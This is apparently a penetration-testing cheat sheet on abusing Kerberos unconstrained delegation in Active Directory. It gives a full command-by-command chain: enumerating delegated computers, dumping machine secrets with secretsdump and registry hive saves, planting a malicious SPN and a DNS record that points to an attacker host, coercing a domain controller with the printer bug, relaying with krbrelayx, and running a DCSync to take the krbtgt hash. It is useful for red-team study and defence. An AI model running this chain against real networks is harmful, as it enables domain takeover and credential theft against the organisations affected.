Enumerate:
PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol
Coerce authentication from a DC while monitoring for TGTs in the background on the owned unconstrained delegation system:
Cmd > .\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap /runfor:60 [/registry:SOFTWARE\MONITOR] [/consoleoutfile:C:\Windows\Temp\monitor.txt]
Cmd > .\SpoolSample.exe dc01.megacorp.local srv01.megacorp.local
Use ticket_converter or ticketConverter.py to convert the TGT from .kirbi
to .ccache
(usable with impacket):
$ python ticket_converter.py dc01.kirbi dc01.ccache
$ KRB5CCNAME=`pwd`/dc01.ccache ...
If output goes to the /registry
:
PS > Get-ChildItem HKLM:\SOFTWARE\MONITOR\
PS > Get-ItemProperty HKLM:\SOFTWARE\MONITOR\[email protected]
PS > Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force
{% embed url="https://snovvcrash.github.io/2021/05/21/calculating-kerberos-keys.html" caption="A Note on Calculating Kerberos Keys for AD Accounts" %}
{% file src="/.gitbook/assets/From Zero Credential to Full Domain Compromise (Haboob Team).pdf" %}
Requirements:
- Owned computer account with unconstrained delegation enabled (SRV01).
- Printer bug on a domain controller (DC01).
- Permissions to add an SPN for the owned computer account and a new DNS record in AD.
1. Grab owned computer account password to calculate its Kerberos AES key. This is done automatically when extracting the password remotely with secretsdump.py
, or it will be done later by krbrelayx.py
when providing it the password in hex from local secretsdump.py
output:
# Remotely
$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
...
MEGACORP\SRV01$:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
# Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL
...
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<PLAIN_PASSWORD_HEX>
2. Add a malicious SPN for the owned computer account with unconstrained delegation:
# Check (no modifications)
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local
# Adding servicePrincipalName that doesn't match full hostname or samAccountName will fail
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local
# But modifying msDS-AdditionalDnsHostName will succeed
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional
3. Add a DNS record pointing to the attacker's host:
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local
4. Check that the record was added successfully (~ 3 minutes):
$ nslookup evil.megacorp.local <DC01_IP>
Server: 192.168.1.11
Address: 192.168.1.11#53
Name: evil.megacorp.local
Address: 10.10.13.37
5. Start krbrelayx.py
providing AES key of the owned computer account or its plain password in hex with salt:
# In case secretsdump.py was used remotely
$ sudo python krbrelayx.py -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
# In case secretsdump.py was used locally
$ sudo python krbrelayx.py --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local
6. Coerce the authentication to attacker's host from DC01 by triggering printer bug:
$ python printerbug.py megacorp.local/'SRV01$'@DC01.megacorp.local -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local
7. Export extracted TGT and perform DCSync to get krbtgt hash (or any other privileged account hash):
$ export KRB5CCNAME=`pwd`/'[email protected][email protected]'
$ secretsdump.py DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
8. Cleanup. Delete SPN and DNS record:
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local
# Check if the SPN was deleted successfully
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'SRV01$' --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01
Other scenarios: